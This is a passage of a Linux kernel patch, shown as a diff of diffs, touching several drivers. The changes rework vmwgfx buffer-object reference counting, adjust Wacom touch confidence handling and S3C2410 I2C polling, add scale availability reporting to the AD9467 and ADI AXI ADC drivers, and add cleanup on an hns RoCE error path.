++extern int vmw_gem_object_create(struct vmw_private *dev_priv,
++				  size_t size, struct ttm_placement *placement,
++				  bool interruptible, bool pin,
++				  void (*bo_free)(struct ttm_buffer_object *bo),
++				  struct vmw_buffer_object **p_bo);
+ extern int vmw_gem_object_create_with_handle(struct vmw_private *dev_priv,
+ 					     struct drm_file *filp,
+ 					     uint32_t size,
+@@ -1600,6 +1605,21 @@ vmw_bo_reference(struct vmw_buffer_object *buf)
+ 	return buf;
+ }
+ 
++static inline struct vmw_buffer_object *vmw_user_bo_ref(struct vmw_buffer_object *vbo)
++{
++	drm_gem_object_get(&vbo->base.base);
++	return vbo;
++}
++
++static inline void vmw_user_bo_unref(struct vmw_buffer_object **buf)
++{
++	struct vmw_buffer_object *tmp_buf = *buf;
++
++	*buf = NULL;
++	if (tmp_buf)
++		drm_gem_object_put(&tmp_buf->base.base);
++}
++
+ static inline void vmw_fifo_resource_inc(struct vmw_private *dev_priv)
+ {
+ 	atomic_inc(&dev_priv->num_fifo_resources);
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+index 7e59469e1cb9f..bc7f02e4ecebb 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c
+@@ -1147,7 +1147,7 @@ static int vmw_translate_mob_ptr(struct vmw_private *dev_priv,
+ 				 SVGAMobId *id,
+ 				 struct vmw_buffer_object **vmw_bo_p)
+ {
+-	struct vmw_buffer_object *vmw_bo;
++	struct vmw_buffer_object *vmw_bo, *tmp_bo;
+ 	uint32_t handle = *id;
+ 	struct vmw_relocation *reloc;
+ 	int ret;
+@@ -1159,8 +1159,8 @@ static int vmw_translate_mob_ptr(struct vmw_private *dev_priv,
+ 		return PTR_ERR(vmw_bo);
+ 	}
+ 	ret = vmw_validation_add_bo(sw_context->ctx, vmw_bo, true, false);
+-	ttm_bo_put(&vmw_bo->base);
+-	drm_gem_object_put(&vmw_bo->base.base);
++	tmp_bo = vmw_bo;
++	vmw_user_bo_unref(&tmp_bo);
+ 	if (unlikely(ret != 0))
+ 		return ret;
+ 
+@@ -1202,7 +1202,7 @@ static int vmw_translate_guest_ptr(struct vmw_private *dev_priv,
+ 				   SVGAGuestPtr *ptr,
+ 				   struct vmw_buffer_object **vmw_bo_p)
+ {
+-	struct vmw_buffer_object *vmw_bo;
++	struct vmw_buffer_object *vmw_bo, *tmp_bo;
+ 	uint32_t handle = ptr->gmrId;
+ 	struct vmw_relocation *reloc;
+ 	int ret;
+@@ -1214,8 +1214,8 @@ static int vmw_translate_guest_ptr(struct vmw_private *dev_priv,
+ 		return PTR_ERR(vmw_bo);
+ 	}
+ 	ret = vmw_validation_add_bo(sw_context->ctx, vmw_bo, false, false);
+-	ttm_bo_put(&vmw_bo->base);
+-	drm_gem_object_put(&vmw_bo->base.base);
++	tmp_bo = vmw_bo;
++	vmw_user_bo_unref(&tmp_bo);
+ 	if (unlikely(ret != 0))
+ 		return ret;
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_gem.c b/drivers/gpu/drm/vmwgfx/vmwgfx_gem.c
+index 4d2c28e39f4e0..e7a533e39155c 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_gem.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_gem.c
+@@ -133,6 +133,22 @@ void vmw_gem_destroy(struct ttm_buffer_object *bo)
+ 	kfree(vbo);
+ }
+ 
++int vmw_gem_object_create(struct vmw_private *vmw,
++			  size_t size, struct ttm_placement *placement,
++			  bool interruptible, bool pin,
++			  void (*bo_free)(struct ttm_buffer_object *bo),
++			  struct vmw_buffer_object **p_bo)
++{
++	int ret = vmw_bo_create(vmw, size, placement, interruptible, pin, bo_free, p_bo);
++
++	if (ret != 0)
++		goto out_no_bo;
++
++	(*p_bo)->base.base.funcs = &vmw_gem_object_funcs;
++out_no_bo:
++	return ret;
++}
++
+ int vmw_gem_object_create_with_handle(struct vmw_private *dev_priv,
+ 				      struct drm_file *filp,
+ 				      uint32_t size,
+@@ -141,16 +157,14 @@ int vmw_gem_object_create_with_handle(struct vmw_private *dev_priv,
+ {
+ 	int ret;
+ 
+-	ret = vmw_bo_create(dev_priv, size,
+-			    (dev_priv->has_mob) ?
++	ret = vmw_gem_object_create(dev_priv, size,
++				    (dev_priv->has_mob) ?
+ 				    &vmw_sys_placement :
+ 				    &vmw_vram_sys_placement,
+-			    true, false, &vmw_gem_destroy, p_vbo);
++				    true, false, &vmw_gem_destroy, p_vbo);
+ 	if (ret != 0)
+ 		goto out_no_bo;
+ 
+-	(*p_vbo)->base.base.funcs = &vmw_gem_object_funcs;
+-
+ 	ret = drm_gem_handle_create(filp, &(*p_vbo)->base.base, handle);
+ out_no_bo:
+ 	return ret;
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+index aab6389cb4aab..aa571b75cd07f 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+@@ -1402,8 +1402,8 @@ static int vmw_create_bo_proxy(struct drm_device *dev,
+ 	/* Reserve and switch the backing mob. */
+ 	mutex_lock(&res->dev_priv->cmdbuf_mutex);
+ 	(void) vmw_resource_reserve(res, false, true);
+-	vmw_bo_unreference(&res->backup);
+-	res->backup = vmw_bo_reference(bo_mob);
++	vmw_user_bo_unref(&res->backup);
++	res->backup = vmw_user_bo_ref(bo_mob);
+ 	res->backup_offset = 0;
+ 	vmw_resource_unreserve(res, false, false, false, NULL, 0);
+ 	mutex_unlock(&res->dev_priv->cmdbuf_mutex);
+@@ -1599,10 +1599,8 @@ static struct drm_framebuffer *vmw_kms_fb_create(struct drm_device *dev,
+ 
+ err_out:
+ 	/* vmw_user_lookup_handle takes one ref so does new_fb */
+-	if (bo) {
+-		vmw_bo_unreference(&bo);
+-		drm_gem_object_put(&bo->base.base);
+-	}
++	if (bo)
++		vmw_user_bo_unref(&bo);
+ 	if (surface)
+ 		vmw_surface_unreference(&surface);
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c b/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
+index b5b311f2a91a4..abc354ead4e8b 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
+@@ -457,8 +457,7 @@ int vmw_overlay_ioctl(struct drm_device *dev, void *data,
+ 
+ 	ret = vmw_overlay_update_stream(dev_priv, buf, arg, true);
+ 
+-	vmw_bo_unreference(&buf);
+-	drm_gem_object_put(&buf->base.base);
++	vmw_user_bo_unref(&buf);
+ 
+ out_unlock:
+ 	mutex_unlock(&overlay->mutex);
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_resource.c b/drivers/gpu/drm/vmwgfx/vmwgfx_resource.c
+index c7d645e5ec7bf..30d1c1918bb48 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_resource.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_resource.c
+@@ -140,7 +140,7 @@ static void vmw_resource_release(struct kref *kref)
+ 		if (res->coherent)
+ 			vmw_bo_dirty_release(res->backup);
+ 		ttm_bo_unreserve(bo);
+-		vmw_bo_unreference(&res->backup);
++		vmw_user_bo_unref(&res->backup);
+ 	}
+ 
+ 	if (likely(res->hw_destroy != NULL)) {
+@@ -330,10 +330,10 @@ static int vmw_resource_buf_alloc(struct vmw_resource *res,
+ 		return 0;
+ 	}
+ 
+-	ret = vmw_bo_create(res->dev_priv, res->backup_size,
+-			    res->func->backup_placement,
+-			    interruptible, false,
+-			    &vmw_bo_bo_free, &backup);
++	ret = vmw_gem_object_create(res->dev_priv, res->backup_size,
++				    res->func->backup_placement,
++				    interruptible, false,
++				    &vmw_bo_bo_free, &backup);
+ 	if (unlikely(ret != 0))
+ 		goto out_no_bo;
+ 
+@@ -452,11 +452,11 @@ void vmw_resource_unreserve(struct vmw_resource *res,
+ 			vmw_resource_mob_detach(res);
+ 			if (res->coherent)
+ 				vmw_bo_dirty_release(res->backup);
+-			vmw_bo_unreference(&res->backup);
++			vmw_user_bo_unref(&res->backup);
+ 		}
+ 
+ 		if (new_backup) {
+-			res->backup = vmw_bo_reference(new_backup);
++			res->backup = vmw_user_bo_ref(new_backup);
+ 
+ 			/*
+ 			 * The validation code should already have added a
+@@ -544,7 +544,7 @@ out_no_reserve:
+ 	ttm_bo_put(val_buf->bo);
+ 	val_buf->bo = NULL;
+ 	if (backup_dirty)
+-		vmw_bo_unreference(&res->backup);
++		vmw_user_bo_unref(&res->backup);
+ 
+ 	return ret;
+ }
+@@ -719,7 +719,7 @@ int vmw_resource_validate(struct vmw_resource *res, bool intr,
+ 		goto out_no_validate;
+ 	else if (!res->func->needs_backup && res->backup) {
+ 		WARN_ON_ONCE(vmw_resource_mob_attached(res));
+-		vmw_bo_unreference(&res->backup);
++		vmw_user_bo_unref(&res->backup);
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_shader.c b/drivers/gpu/drm/vmwgfx/vmwgfx_shader.c
+index 51e83dfa1cace..303f7a82f3509 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_shader.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_shader.c
+@@ -177,7 +177,7 @@ static int vmw_gb_shader_init(struct vmw_private *dev_priv,
+ 
+ 	res->backup_size = size;
+ 	if (byte_code) {
+-		res->backup = vmw_bo_reference(byte_code);
++		res->backup = vmw_user_bo_ref(byte_code);
+ 		res->backup_offset = offset;
+ 	}
+ 	shader->size = size;
+@@ -806,8 +806,7 @@ static int vmw_shader_define(struct drm_device *dev, struct drm_file *file_priv,
+ 				    shader_type, num_input_sig,
+ 				    num_output_sig, tfile, shader_handle);
+ out_bad_arg:
+-	vmw_bo_unreference(&buffer);
+-	drm_gem_object_put(&buffer->base.base);
++	vmw_user_bo_unref(&buffer);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c b/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
+index 1a1a286bc749f..50769528c3f3c 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_surface.c
+@@ -683,9 +683,6 @@ static void vmw_user_surface_base_release(struct ttm_base_object **p_base)
+ 	    container_of(base, struct vmw_user_surface, prime.base);
+ 	struct vmw_resource *res = &user_srf->srf.res;
+ 
+-	if (res && res->backup)
+-		drm_gem_object_put(&res->backup->base.base);
+-
+ 	*p_base = NULL;
+ 	vmw_resource_unreference(&res);
+ }
+@@ -848,23 +845,17 @@ int vmw_surface_define_ioctl(struct drm_device *dev, void *data,
+ 	 * expect a backup buffer to be present.
+ 	 */
+ 	if (dev_priv->has_mob && req->shareable) {
+-		uint32_t backup_handle;
+-
+-		ret = vmw_gem_object_create_with_handle(dev_priv,
+-							file_priv,
+-							res->backup_size,
+-							&backup_handle,
+-							&res->backup);
++		ret = vmw_gem_object_create(dev_priv,
++					    res->backup_size,
++					    &vmw_sys_placement,
++					    true,
++					    false,
++					    &vmw_gem_destroy,
++					    &res->backup);
+ 		if (unlikely(ret != 0)) {
+ 			vmw_resource_unreference(&res);
+ 			goto out_unlock;
+ 		}
+-		vmw_bo_reference(res->backup);
+-		/*
+-		 * We don't expose the handle to the userspace and surface
+-		 * already holds a gem reference
+-		 */
+-		drm_gem_handle_delete(file_priv, backup_handle);
+ 	}
+ 
+ 	tmp = vmw_resource_reference(&srf->res);
+@@ -1505,7 +1496,7 @@ vmw_gb_surface_define_internal(struct drm_device *dev,
+ 		if (ret == 0) {
+ 			if (res->backup->base.base.size < res->backup_size) {
+ 				VMW_DEBUG_USER("Surface backup buffer too small.\n");
+-				vmw_bo_unreference(&res->backup);
++				vmw_user_bo_unref(&res->backup);
+ 				ret = -EINVAL;
+ 				goto out_unlock;
+ 			} else {
+@@ -1519,8 +1510,6 @@ vmw_gb_surface_define_internal(struct drm_device *dev,
+ 							res->backup_size,
+ 							&backup_handle,
+ 							&res->backup);
+-		if (ret == 0)
+-			vmw_bo_reference(res->backup);
+ 	}
+ 
+ 	if (unlikely(ret != 0)) {
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index c1270db121784..165ed872fa4e7 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -2646,8 +2646,8 @@ static void wacom_wac_finger_slot(struct wacom_wac *wacom_wac,
+ {
+ 	struct hid_data *hid_data = &wacom_wac->hid_data;
+ 	bool mt = wacom_wac->features.touch_max > 1;
+-	bool prox = hid_data->tipswitch &&
+-		    report_touch_events(wacom_wac);
++	bool touch_down = hid_data->tipswitch && hid_data->confidence;
++	bool prox = touch_down && report_touch_events(wacom_wac);
+ 
+ 	if (touch_is_muted(wacom_wac)) {
+ 		if (!wacom_wac->shared->touch_down)
+@@ -2697,24 +2697,6 @@ static void wacom_wac_finger_slot(struct wacom_wac *wacom_wac,
+ 	}
+ }
+ 
+-static bool wacom_wac_slot_is_active(struct input_dev *dev, int key)
+-{
+-	struct input_mt *mt = dev->mt;
+-	struct input_mt_slot *s;
+-
+-	if (!mt)
+-		return false;
+-
+-	for (s = mt->slots; s != mt->slots + mt->num_slots; s++) {
+-		if (s->key == key &&
+-			input_mt_get_value(s, ABS_MT_TRACKING_ID) >= 0) {
+-			return true;
+-		}
+-	}
+-
+-	return false;
+-}
+-
+ static void wacom_wac_finger_event(struct hid_device *hdev,
+ 		struct hid_field *field, struct hid_usage *usage, __s32 value)
+ {
+@@ -2765,14 +2747,8 @@ static void wacom_wac_finger_event(struct hid_device *hdev,
+ 	}
+ 
+ 	if (usage->usage_index + 1 == field->report_count) {
+-		if (equivalent_usage == wacom_wac->hid_data.last_slot_field) {
+-			bool touch_removed = wacom_wac_slot_is_active(wacom_wac->touch_input,
+-				wacom_wac->hid_data.id) && !wacom_wac->hid_data.tipswitch;
+-
+-			if (wacom_wac->hid_data.confidence || touch_removed) {
+-				wacom_wac_finger_slot(wacom_wac, wacom_wac->touch_input);
+-			}
+-		}
++		if (equivalent_usage == wacom_wac->hid_data.last_slot_field)
++			wacom_wac_finger_slot(wacom_wac, wacom_wac->touch_input);
+ 	}
+ }
+ 
+diff --git a/drivers/i2c/busses/i2c-s3c2410.c b/drivers/i2c/busses/i2c-s3c2410.c
+index 36dab9cd208cf..8e3838c42a8c2 100644
+--- a/drivers/i2c/busses/i2c-s3c2410.c
++++ b/drivers/i2c/busses/i2c-s3c2410.c
+@@ -220,8 +220,17 @@ static bool is_ack(struct s3c24xx_i2c *i2c)
+ 	int tries;
+ 
+ 	for (tries = 50; tries; --tries) {
+-		if (readl(i2c->regs + S3C2410_IICCON)
+-			& S3C2410_IICCON_IRQPEND) {
++		unsigned long tmp = readl(i2c->regs + S3C2410_IICCON);
++
++		if (!(tmp & S3C2410_IICCON_ACKEN)) {
++			/*
++			 * Wait a bit for the bus to stabilize,
++			 * delay estimated experimentally.
++			 */
++			usleep_range(100, 200);
++			return true;
++		}
++		if (tmp & S3C2410_IICCON_IRQPEND) {
+ 			if (!(readl(i2c->regs + S3C2410_IICSTAT)
+ 				& S3C2410_IICSTAT_LASTBIT))
+ 				return true;
+@@ -274,16 +283,6 @@ static void s3c24xx_i2c_message_start(struct s3c24xx_i2c *i2c,
+ 
+ 	stat |= S3C2410_IICSTAT_START;
+ 	writel(stat, i2c->regs + S3C2410_IICSTAT);
+-
+-	if (i2c->quirks & QUIRK_POLL) {
+-		while ((i2c->msg_num != 0) && is_ack(i2c)) {
+-			i2c_s3c_irq_nextbyte(i2c, stat);
+-			stat = readl(i2c->regs + S3C2410_IICSTAT);
+-
+-			if (stat & S3C2410_IICSTAT_ARBITR)
+-				dev_err(i2c->dev, "deal with arbitration loss\n");
+-		}
+-	}
+ }
+ 
+ static inline void s3c24xx_i2c_stop(struct s3c24xx_i2c *i2c, int ret)
+@@ -690,7 +689,7 @@ static void s3c24xx_i2c_wait_idle(struct s3c24xx_i2c *i2c)
+ static int s3c24xx_i2c_doxfer(struct s3c24xx_i2c *i2c,
+ 			      struct i2c_msg *msgs, int num)
+ {
+-	unsigned long timeout;
++	unsigned long timeout = 0;
+ 	int ret;
+ 
+ 	ret = s3c24xx_i2c_set_master(i2c);
+@@ -710,16 +709,19 @@ static int s3c24xx_i2c_doxfer(struct s3c24xx_i2c *i2c,
+ 	s3c24xx_i2c_message_start(i2c, msgs);
+ 
+ 	if (i2c->quirks & QUIRK_POLL) {
+-		ret = i2c->msg_idx;
++		while ((i2c->msg_num != 0) && is_ack(i2c)) {
++			unsigned long stat = readl(i2c->regs + S3C2410_IICSTAT);
+ 
+-		if (ret != num)
+-			dev_dbg(i2c->dev, "incomplete xfer (%d)\n", ret);
++			i2c_s3c_irq_nextbyte(i2c, stat);
+ 
+-		goto out;
++			stat = readl(i2c->regs + S3C2410_IICSTAT);
++			if (stat & S3C2410_IICSTAT_ARBITR)
++				dev_err(i2c->dev, "deal with arbitration loss\n");
++		}
++	} else {
++		timeout = wait_event_timeout(i2c->wait, i2c->msg_num == 0, HZ * 5);
+ 	}
+ 
+-	timeout = wait_event_timeout(i2c->wait, i2c->msg_num == 0, HZ * 5);
+-
+ 	ret = i2c->msg_idx;
+ 
+ 	/*
+diff --git a/drivers/iio/adc/ad7091r-base.c b/drivers/iio/adc/ad7091r-base.c
+index 8e252cde735b9..0e5d3d2e9c985 100644
+--- a/drivers/iio/adc/ad7091r-base.c
++++ b/drivers/iio/adc/ad7091r-base.c
+@@ -174,8 +174,8 @@ static const struct iio_info ad7091r_info = {
+ 
+ static irqreturn_t ad7091r_event_handler(int irq, void *private)
+ {
+-	struct ad7091r_state *st = (struct ad7091r_state *) private;
+-	struct iio_dev *iio_dev = dev_get_drvdata(st->dev);
++	struct iio_dev *iio_dev = private;
++	struct ad7091r_state *st = iio_priv(iio_dev);
+ 	unsigned int i, read_val;
+ 	int ret;
+ 	s64 timestamp = iio_get_time_ns(iio_dev);
+@@ -234,7 +234,7 @@ int ad7091r_probe(struct device *dev, const char *name,
+ 	if (irq) {
+ 		ret = devm_request_threaded_irq(dev, irq, NULL,
+ 				ad7091r_event_handler,
+-				IRQF_TRIGGER_FALLING | IRQF_ONESHOT, name, st);
++				IRQF_TRIGGER_FALLING | IRQF_ONESHOT, name, iio_dev);
+ 		if (ret)
+ 			return ret;
+ 	}
+diff --git a/drivers/iio/adc/ad9467.c b/drivers/iio/adc/ad9467.c
+index 7534572f74757..811525857d29f 100644
+--- a/drivers/iio/adc/ad9467.c
++++ b/drivers/iio/adc/ad9467.c
+@@ -119,9 +119,9 @@ struct ad9467_state {
+ 	struct spi_device		*spi;
+ 	struct clk			*clk;
+ 	unsigned int			output_mode;
++	unsigned int                    (*scales)[2];
+ 
+ 	struct gpio_desc		*pwrdown_gpio;
+-	struct gpio_desc		*reset_gpio;
+ };
+ 
+ static int ad9467_spi_read(struct spi_device *spi, unsigned int reg)
+@@ -163,9 +163,10 @@ static int ad9467_reg_access(struct adi_axi_adc_conv *conv, unsigned int reg,
+ 
+ 	if (readval == NULL) {
+ 		ret = ad9467_spi_write(spi, reg, writeval);
+-		ad9467_spi_write(spi, AN877_ADC_REG_TRANSFER,
+-				 AN877_ADC_TRANSFER_SYNC);
+-		return ret;
++		if (ret)
++			return ret;
++		return ad9467_spi_write(spi, AN877_ADC_REG_TRANSFER,
++					AN877_ADC_TRANSFER_SYNC);
+ 	}
+ 
+ 	ret = ad9467_spi_read(spi, reg);
+@@ -212,6 +213,7 @@ static void __ad9467_get_scale(struct adi_axi_adc_conv *conv, int index,
+ 	.channel = _chan,						\
+ 	.info_mask_shared_by_type = BIT(IIO_CHAN_INFO_SCALE) |		\
+ 		BIT(IIO_CHAN_INFO_SAMP_FREQ),				\
++	.info_mask_shared_by_type_available = BIT(IIO_CHAN_INFO_SCALE), \
+ 	.scan_index = _si,						\
+ 	.scan_type = {							\
+ 		.sign = _sign,						\
+@@ -273,10 +275,13 @@ static int ad9467_get_scale(struct adi_axi_adc_conv *conv, int *val, int *val2)
+ 	const struct ad9467_chip_info *info1 = to_ad9467_chip_info(info);
+ 	struct ad9467_state *st = adi_axi_adc_conv_priv(conv);
+ 	unsigned int i, vref_val;
++	int ret;
+ 
+-	vref_val = ad9467_spi_read(st->spi, AN877_ADC_REG_VREF);
++	ret = ad9467_spi_read(st->spi, AN877_ADC_REG_VREF);
++	if (ret < 0)
++		return ret;
+ 
+-	vref_val &= info1->vref_mask;
++	vref_val = ret & info1->vref_mask;
+ 
+ 	for (i = 0; i < info->num_scales; i++) {
+ 		if (vref_val == info->scale_table[i][1])
+@@ -297,6 +302,7 @@ static int ad9467_set_scale(struct adi_axi_adc_conv *conv, int val, int val2)
+ 	struct ad9467_state *st = adi_axi_adc_conv_priv(conv);
+ 	unsigned int scale_val[2];
+ 	unsigned int i;
++	int ret;
+ 
+ 	if (val != 0)
+ 		return -EINVAL;
+@@ -306,11 +312,13 @@ static int ad9467_set_scale(struct adi_axi_adc_conv *conv, int val, int val2)
+ 		if (scale_val[0] != val || scale_val[1] != val2)
+ 			continue;
+ 
+-		ad9467_spi_write(st->spi, AN877_ADC_REG_VREF,
+-				 info->scale_table[i][1]);
+-		ad9467_spi_write(st->spi, AN877_ADC_REG_TRANSFER,
+-				 AN877_ADC_TRANSFER_SYNC);
+-		return 0;
++		ret = ad9467_spi_write(st->spi, AN877_ADC_REG_VREF,
++				       info->scale_table[i][1]);
++		if (ret < 0)
++			return ret;
++
++		return ad9467_spi_write(st->spi, AN877_ADC_REG_TRANSFER,
++					AN877_ADC_TRANSFER_SYNC);
+ 	}
+ 
+ 	return -EINVAL;
+@@ -359,6 +367,26 @@ static int ad9467_write_raw(struct adi_axi_adc_conv *conv,
+ 	}
+ }
+ 
++static int ad9467_read_avail(struct adi_axi_adc_conv *conv,
++			     struct iio_chan_spec const *chan,
++			     const int **vals, int *type, int *length,
++			     long mask)
++{
++	const struct adi_axi_adc_chip_info *info = conv->chip_info;
++	struct ad9467_state *st = adi_axi_adc_conv_priv(conv);
++
++	switch (mask) {
++	case IIO_CHAN_INFO_SCALE:
++		*vals = (const int *)st->scales;
++		*type = IIO_VAL_INT_PLUS_MICRO;
++		/* Values are stored in a 2D matrix */
++		*length = info->num_scales * 2;
++		return IIO_AVAIL_LIST;
++	default:
++		return -EINVAL;
++	}
++}
++
+ static int ad9467_outputmode_set(struct spi_device *spi, unsigned int mode)
+ {
+ 	int ret;
+@@ -371,6 +399,26 @@ static int ad9467_outputmode_set(struct spi_device *spi, unsigned int mode)
+ 				AN877_ADC_TRANSFER_SYNC);
+ }
+ 
++static int ad9467_scale_fill(struct adi_axi_adc_conv *conv)
++{
++	const struct adi_axi_adc_chip_info *info = conv->chip_info;
++	struct ad9467_state *st = adi_axi_adc_conv_priv(conv);
++	unsigned int i, val1, val2;
++
++	st->scales = devm_kmalloc_array(&st->spi->dev, info->num_scales,
++					sizeof(*st->scales), GFP_KERNEL);
++	if (!st->scales)
++		return -ENOMEM;
++
++	for (i = 0; i < info->num_scales; i++) {
++		__ad9467_get_scale(conv, i, &val1, &val2);
++		st->scales[i][0] = val1;
++		st->scales[i][1] = val2;
++	}
++
++	return 0;
++}
++
+ static int ad9467_preenable_setup(struct adi_axi_adc_conv *conv)
+ {
+ 	struct ad9467_state *st = adi_axi_adc_conv_priv(conv);
+@@ -378,6 +426,21 @@ static int ad9467_preenable_setup(struct adi_axi_adc_conv *conv)
+ 	return ad9467_outputmode_set(st->spi, st->output_mode);
+ }
+ 
++static int ad9467_reset(struct device *dev)
++{
++	struct gpio_desc *gpio;
++
++	gpio = devm_gpiod_get_optional(dev, "reset", GPIOD_OUT_HIGH);
++	if (IS_ERR_OR_NULL(gpio))
++		return PTR_ERR_OR_ZERO(gpio);
++
++	fsleep(1);
++	gpiod_set_value_cansleep(gpio, 0);
++	fsleep(10 * USEC_PER_MSEC);
++
++	return 0;
++}
++
+ static int ad9467_probe(struct spi_device *spi)
+ {
+ 	const struct ad9467_chip_info *info;
+@@ -406,21 +469,16 @@ static int ad9467_probe(struct spi_device *spi)
+ 	if (IS_ERR(st->pwrdown_gpio))
+ 		return PTR_ERR(st->pwrdown_gpio);
+ 
+-	st->reset_gpio = devm_gpiod_get_optional(&spi->dev, "reset",
+-						 GPIOD_OUT_LOW);
+-	if (IS_ERR(st->reset_gpio))
+-		return PTR_ERR(st->reset_gpio);
+-
+-	if (st->reset_gpio) {
+-		udelay(1);
+-		ret = gpiod_direction_output(st->reset_gpio, 1);
+-		if (ret)
+-			return ret;
+-		mdelay(10);
+-	}
++	ret = ad9467_reset(&spi->dev);
++	if (ret)
++		return ret;
+ 
+ 	conv->chip_info = &info->axi_adc_info;
+ 
++	ret = ad9467_scale_fill(conv);
++	if (ret)
++		return ret;
++
+ 	id = ad9467_spi_read(spi, AN877_ADC_REG_CHIP_ID);
+ 	if (id != conv->chip_info->id) {
+ 		dev_err(&spi->dev, "Mismatch CHIP_ID, got 0x%X, expected 0x%X\n",
+@@ -431,6 +489,7 @@ static int ad9467_probe(struct spi_device *spi)
+ 	conv->reg_access = ad9467_reg_access;
+ 	conv->write_raw = ad9467_write_raw;
+ 	conv->read_raw = ad9467_read_raw;
++	conv->read_avail = ad9467_read_avail;
+ 	conv->preenable_setup = ad9467_preenable_setup;
+ 
+ 	st->output_mode = info->default_output_mode |
+diff --git a/drivers/iio/adc/adi-axi-adc.c b/drivers/iio/adc/adi-axi-adc.c
+index e8a8ea4140f16..ad386ac7f03cb 100644
+--- a/drivers/iio/adc/adi-axi-adc.c
++++ b/drivers/iio/adc/adi-axi-adc.c
+@@ -143,6 +143,20 @@ static int adi_axi_adc_write_raw(struct iio_dev *indio_dev,
+ 	return conv->write_raw(conv, chan, val, val2, mask);
+ }
+ 
++static int adi_axi_adc_read_avail(struct iio_dev *indio_dev,
++				  struct iio_chan_spec const *chan,
++				  const int **vals, int *type, int *length,
++				  long mask)
++{
++	struct adi_axi_adc_state *st = iio_priv(indio_dev);
++	struct adi_axi_adc_conv *conv = &st->client->conv;
++
++	if (!conv->read_avail)
++		return -EOPNOTSUPP;
++
++	return conv->read_avail(conv, chan, vals, type, length, mask);
++}
++
+ static int adi_axi_adc_update_scan_mode(struct iio_dev *indio_dev,
+ 					const unsigned long *scan_mask)
+ {
+@@ -227,69 +241,11 @@ struct adi_axi_adc_conv *devm_adi_axi_adc_conv_register(struct device *dev,
+ }
+ EXPORT_SYMBOL_NS_GPL(devm_adi_axi_adc_conv_register, IIO_ADI_AXI);
+ 
+-static ssize_t in_voltage_scale_available_show(struct device *dev,
+-					       struct device_attribute *attr,
+-					       char *buf)
+-{
+-	struct iio_dev *indio_dev = dev_to_iio_dev(dev);
+-	struct adi_axi_adc_state *st = iio_priv(indio_dev);
+-	struct adi_axi_adc_conv *conv = &st->client->conv;
+-	size_t len = 0;
+-	int i;
+-
+-	for (i = 0; i < conv->chip_info->num_scales; i++) {
+-		const unsigned int *s = conv->chip_info->scale_table[i];
+-
+-		len += scnprintf(buf + len, PAGE_SIZE - len,
+-				 "%u.%06u ", s[0], s[1]);
+-	}
+-	buf[len - 1] = '\n';
+-
+-	return len;
+-}
+-
+-static IIO_DEVICE_ATTR_RO(in_voltage_scale_available, 0);
+-
+-enum {
+-	ADI_AXI_ATTR_SCALE_AVAIL,
+-};
+-
+-#define ADI_AXI_ATTR(_en_, _file_)			\
+-	[ADI_AXI_ATTR_##_en_] = &iio_dev_attr_##_file_.dev_attr.attr
+-
+-static struct attribute *adi_axi_adc_attributes[] = {
+-	ADI_AXI_ATTR(SCALE_AVAIL, in_voltage_scale_available),
+-	NULL
+-};
+-
+-static umode_t axi_adc_attr_is_visible(struct kobject *kobj,
+-				       struct attribute *attr, int n)
+-{
+-	struct device *dev = kobj_to_dev(kobj);
+-	struct iio_dev *indio_dev = dev_to_iio_dev(dev);
+-	struct adi_axi_adc_state *st = iio_priv(indio_dev);
+-	struct adi_axi_adc_conv *conv = &st->client->conv;
+-
+-	switch (n) {
+-	case ADI_AXI_ATTR_SCALE_AVAIL:
+-		if (!conv->chip_info->num_scales)
+-			return 0;
+-		return attr->mode;
+-	default:
+-		return attr->mode;
+-	}
+-}
+-
+-static const struct attribute_group adi_axi_adc_attribute_group = {
+-	.attrs = adi_axi_adc_attributes,
+-	.is_visible = axi_adc_attr_is_visible,
+-};
+-
+ static const struct iio_info adi_axi_adc_info = {
+ 	.read_raw = &adi_axi_adc_read_raw,
+ 	.write_raw = &adi_axi_adc_write_raw,
+-	.attrs = &adi_axi_adc_attribute_group,
+ 	.update_scan_mode = &adi_axi_adc_update_scan_mode,
++	.read_avail = &adi_axi_adc_read_avail,
+ };
+ 
+ static const struct adi_axi_adc_core_info adi_axi_adc_10_0_a_info = {
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index c2ee80546d120..58fbb1d3b7f41 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -2819,6 +2819,10 @@ static int free_mr_alloc_res(struct hns_roce_dev *hr_dev)
+ 	return 0;
+ 
+ create_failed_qp:
++	for (i--; i >= 0; i--) {
++		hns_roce_v2_destroy_qp(&free_mr->rsv_qp[i]->ibqp, NULL);
++		kfree(free_mr->rsv_qp[i]);
++	}
